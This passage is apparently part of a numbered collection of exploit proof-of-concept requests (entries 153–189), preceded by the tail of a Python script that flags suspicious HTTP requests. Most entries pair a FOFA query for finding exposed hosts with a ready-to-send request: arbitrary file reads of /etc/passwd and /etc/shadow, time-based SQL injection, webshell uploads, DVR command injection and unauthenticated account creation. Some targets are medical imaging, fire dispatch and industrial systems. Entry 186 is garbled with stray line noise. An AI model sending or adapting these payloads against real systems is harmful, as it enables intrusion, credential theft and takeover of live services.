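    except (binascii.Error, ValueError):  # UnicodeDecodeError is a ValueError
        return None


def parse_raw_request(text):
    """Split a raw request into (method, target, lower-cased headers, body)."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def inspect_request(text):
    """Return the sorted list of finding tags for one raw request."""
    _method, target, headers, body = parse_raw_request(text)
    findings = set()
    parts = urlsplit(target)

    if TRAVERSAL_RE.search(unquote(parts.path)):
        findings.add("path-traversal")

    # Query values: SQL keywords in clear text (only together with a quote or
    # parenthesis, so a value like page=select is not flagged) or hidden in a
    # base64 blob as in the importexport.php sql= parameter (entry 122).
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if SQL_RE.search(value) and ("'" in value or "(" in value):
                findings.add("sql-metachar:" + name)
            decoded = b64_text(value)
            if decoded is not None and SQL_RE.search(decoded):
                findings.add("base64-sql:" + name)

    auth = headers.get("authorization", "")
    if auth.lower().startswith("basic "):
        cred = b64_text(auth.split(None, 1)[1])
        if cred is not None and SHELL_META & set(cred):
            findings.add("basic-auth-shell-metachar")

    if headers.get("content-type", "").lower().startswith("multipart/form-data"):
        for match in re.finditer(r'filename="([^"]*)"', body):
            if match.group(1).lower().endswith(SCRIPT_EXT):
                findings.add("upload-script-filename")
    return sorted(findings)


SAMPLE_REQUESTS = {  # constructed traffic shaped like the entries above
    "traversal": "GET /static/../../../../../etc/passwd HTTP/1.1\r\n"
                 "Host: app.example\r\n\r\n",
    "b64sql": "GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk="
              "&type=exportexcelbysql HTTP/1.1\r\nHost: app.example\r\n\r\n",
    "timesql": "GET /api/item.php?uuid=1%27%20AND%20(SELECT%201%20FROM%20"
               "(SELECT(SLEEP(5)))x)%20AND%20%271%27=%271 HTTP/1.1\r\n"
               "Host: app.example\r\n\r\n",
    "basic": "GET /access/set?param=enableapi&value=1 HTTP/1.1\r\n"
             "Host: lb.example\r\n"
             "Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=\r\n\r\n",
    "upload": "POST /admin/upload HTTP/1.1\r\nHost: app.example\r\n"
              "Content-Type: multipart/form-data; boundary=----ExampleBoundary\r\n\r\n"
              "------ExampleBoundary\r\n"
              'Content-Disposition: form-data; name="file"; filename="avatar.php"\r\n'
              "Content-Type: image/png\r\n\r\nplaceholder\r\n------ExampleBoundary--\r\n",
    "benign": "GET /index.php?page=select&id=10 HTTP/1.1\r\nHost: app.example\r\n"
              "Authorization: Basic dXNlcjpwYXNz\r\n\r\n",
}

if __name__ == "__main__":
    for label, raw in SAMPLE_REQUESTS.items():
        print(f"{label:10s} -> {inspect_request(raw)}")
```

The checks are deliberately narrow: the clear-text SQL rule requires a quote or parenthesis next to the keyword so that ordinary form values are not flagged, and the base64 rule only fires when the decoded bytes are valid UTF-8 text containing a SQL keyword, which is what distinguishes the encoded sql= parameter of entry 122 from random tokens that happen to be base64-shaped.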
153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request the /config file to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the temporary file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The uploaded file is then reachable at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. INFINITT PACS (英飞达医学影像存档与通信系统) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

& Y8 {$ R* r8 h186. F-logic DataCube3 SQL注入
& ?5 U- j9 D) R! T) R' `- O. i: iCVE-2024-31750
. K# @" s% p5 U. e% R0 JF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统: ~9 d$ I1 \7 H! M
FOFA:title=="DataCube3"
; x, {9 I% H: q& k9 r7 b' M1 vPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
# p; [" l% v: H$ e+ s/ x. Q' sHost: your-ip
$ ~: g2 ~5 r  c# H0 [. e1 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0( H9 M0 @- A; \- k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8  h/ |5 ]4 Y; I- {4 E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) J& s0 ?$ W9 t. I( }Accept-Encoding: gzip, deflate/ K  y. g) Z4 ^& a6 s
Connection: close! t/ }9 `4 c8 O# k' U/ f
Content-Type: application/x-www-form-urlencoded& F3 K2 i! K) V( K; y9 ^

1 \* [/ s; M: Q: |5 [6 vreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
8 z1 f4 [$ H1 L. j% c$ @7 m) t" |$ S  l# t% d3 P! h* P  l/ B
8 [% e0 ]" f1 h+ L% d% p/ Y
187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


